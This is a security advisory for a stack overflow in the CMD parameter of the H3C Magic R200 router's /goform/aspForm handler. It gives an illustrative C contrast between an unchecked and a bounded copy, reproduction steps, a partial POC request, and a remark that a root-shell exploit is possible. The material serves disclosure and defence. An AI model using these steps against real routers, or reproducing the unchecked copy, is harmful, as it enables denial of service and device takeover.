# H3C Magic R200: stack overflow via the CMD parameter at /goform/aspForm
###### tags: `H3C` `Magic R200`
Authors: Wolin Zhuang, Yifeng Li
## Vulnerability Description
H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the CMD parameter at /goform/aspForm.
## Vulnerability Details
The program reads the value of the CMD parameter into `v6` and then copies `v6` into `&cmdBuff`. The size of `v6` is not checked before the copy, which results in a buffer overflow vulnerability.
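
The unchecked copy described above, next to a bounded version that rejects an oversized value, as an added example that is not H3C's code or the authors'. The buffer size, the function names and the use of `strcpy` are assumptions; the advisory only names `v6` and `cmdBuff`.

```c
#include <stdio.h>
#include <string.h>

#define CMD_BUFF_SIZE 32   /* assumed; the advisory does not give the real size */

/* The pattern the advisory describes: v6 (the CMD value) is copied into the
 * buffer with no size check. strcpy stands in for the firmware's copy routine.
 * Kept for contrast only; nothing below calls it. */
void copy_cmd_unchecked(char *cmdBuff, const char *v6)
{
    strcpy(cmdBuff, v6);   /* writes strlen(v6) + 1 bytes, whatever the buffer holds */
}

/* Bounded copy: returns 0 on success, -1 if v6 is missing or does not fit. */
int copy_cmd_checked(char *cmdBuff, size_t cap, const char *v6)
{
    size_t n;
    if (cmdBuff == NULL || cap == 0)
        return -1;
    cmdBuff[0] = '\0';
    if (v6 == NULL)
        return -1;
    for (n = 0; n < cap && v6[n] != '\0'; n++)
        ;                        /* measure v6 without reading past cap bytes */
    if (n == cap)                /* no room for the terminating NUL: reject */
        return -1;
    memcpy(cmdBuff, v6, n + 1);  /* n + 1 <= cap, includes the NUL */
    return 0;
}

/* Hypothetical handler: 400 for an oversized CMD instead of truncating it. */
int handle_asp_form(const char *cmd_value)
{
    char cmdBuff[CMD_BUFF_SIZE];   /* stack buffer, as in the advisory */
    if (copy_cmd_checked(cmdBuff, sizeof cmdBuff, cmd_value) != 0)
        return 400;
    return 200;
}

int main(void)
{
    char big[4 * CMD_BUFF_SIZE];             /* constructed oversized value */
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    printf("short CMD     -> %d\n", handle_asp_form("status"));  /* constructed */
    printf("oversized CMD -> %d\n", handle_asp_form(big));
    return 0;
}
```

Rejecting the request, rather than silently truncating the value, keeps a shortened CMD string from being acted on.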
## Reproducing the vulnerability and POC
In order to reproduce the vulnerability, the following steps can be followed:
1. Upgrade the Magic_R200 router to the newest version (we have a physical machine)
2. Log in to 192.168.124.1 as admin
3. Attack with the following POC

```
POST /goform/aspForm HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
Accept-Encoding: gzip, deflate
Cookie: PSWMOBILEFLAG=true; USERLOGINIDFLAG=; LOGIN_PSD_REM_FLAG=
```

By sending a carefully constructed packet such as the POC above, we can cause a stack overflow error, leading to denial of service.
You can also write your own exploit to get a root shell.